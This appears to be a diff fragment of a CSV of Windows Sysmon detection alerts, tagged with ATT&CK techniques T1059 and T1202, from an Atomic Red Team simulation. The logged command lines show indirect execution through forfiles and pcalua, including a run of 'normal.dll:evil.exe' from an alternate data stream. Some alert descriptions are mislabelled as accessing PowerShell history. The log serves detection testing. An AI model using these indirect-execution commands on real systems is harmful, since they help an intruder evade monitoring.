+    <Data Name=""ParentProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
+    <Data Name=""ParentProcessId"">5632</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T15:09:43.329083Z"">
+    </TimeCreated>
+    <EventRecordID>4107</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 15:09:43.301</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
+    <Data Name=""ProcessId"">5632</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D4B8-5D31-0000-0010A8CE0600</Data>
+    <Data Name=""ParentProcessId"">4416</Data>
+    <Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname (  ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>3</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>3</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:58.359021Z"">
+    </TimeCreated>
+    <EventRecordID>4105</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3400"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">Suspicious NetCon</Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:52.847</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ProcessId"">3912</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""Protocol"">tcp</Data>
+    <Data Name=""Initiated"">true</Data>
+    <Data Name=""SourceIsIpv6"">false</Data>
+    <Data Name=""SourceIp"">10.0.2.15</Data>
+    <Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
+    <Data Name=""SourcePort"">49734</Data>
+    <Data Name=""SourcePortName""></Data>
+    <Data Name=""DestinationIsIpv6"">false</Data>
+    <Data Name=""DestinationIp"">151.101.0.133</Data>
+    <Data Name=""DestinationHostname""></Data>
+    <Data Name=""DestinationPort"">443</Data>
+    <Data Name=""DestinationPortName"">https</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:55.236766Z"">
+    </TimeCreated>
+    <EventRecordID>4104</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:55.181</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-001061933F00</Data>
+    <Data Name=""ProcessId"">1724</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles  /p c:\windows\system32 /m notepad.exe /c  c:\folder\normal.dll:evil.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:55.138826Z"">
+    </TimeCreated>
+    <EventRecordID>4103</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:55.056</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-0010918F3F00</Data>
+    <Data Name=""ProcessId"">4092</Data>
+    <Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">forfiles  /p c:\windows\system32 /m notepad.exe /c  c:\folder\normal.dll:evil.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA73-5D31-0000-00106A8D3F00</Data>
+    <Data Name=""ParentProcessId"">1052</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:55.069079Z"">
+    </TimeCreated>
+    <EventRecordID>4102</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:55.024</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-00106A8D3F00</Data>
+    <Data Name=""ProcessId"">1052</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:54.129841Z"">
+    </TimeCreated>
+    <EventRecordID>4100</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:54.123</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA72-5D31-0000-001056513F00</Data>
+    <Data Name=""ProcessId"">3680</Data>
+    <Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA72-5D31-0000-0010044F3F00</Data>
+    <Data Name=""ParentProcessId"">1300</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:54.099318Z"">
+    </TimeCreated>
+    <EventRecordID>4099</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:54.080</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA72-5D31-0000-0010044F3F00</Data>
+    <Data Name=""ProcessId"">1300</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:53.882434Z"">
+    </TimeCreated>
+    <EventRecordID>4098</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:53.815</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA71-5D31-0000-00101A463F00</Data>
+    <Data Name=""ProcessId"">6168</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe  -a C:\Windows\system32\javacpl.cpl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:52.982726Z"">
+    </TimeCreated>
+    <EventRecordID>4097</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:52.816</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA70-5D31-0000-00100E2C3F00</Data>
+    <Data Name=""ProcessId"">112</Data>
+    <Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Program Compatibility Assistant</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">pcalua.exe  -a C:\Windows\system32\javacpl.cpl</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-DA70-5D31-0000-001007293F00</Data>
+    <Data Name=""ParentProcessId"">608</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-19T14:57:52.923610Z"">
+    </TimeCreated>
+    <EventRecordID>4096</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2796"" ThreadID=""3592"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-19 14:57:52.784</Data>
+    <Data Name=""ProcessGuid"">747F3D96-DA70-5D31-0000-001007293F00</Data>
+    <Data Name=""ProcessId"">608</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
+    <Data Name=""LogonId"">0x50951</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
+    <Data Name=""ParentProcessId"">3912</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
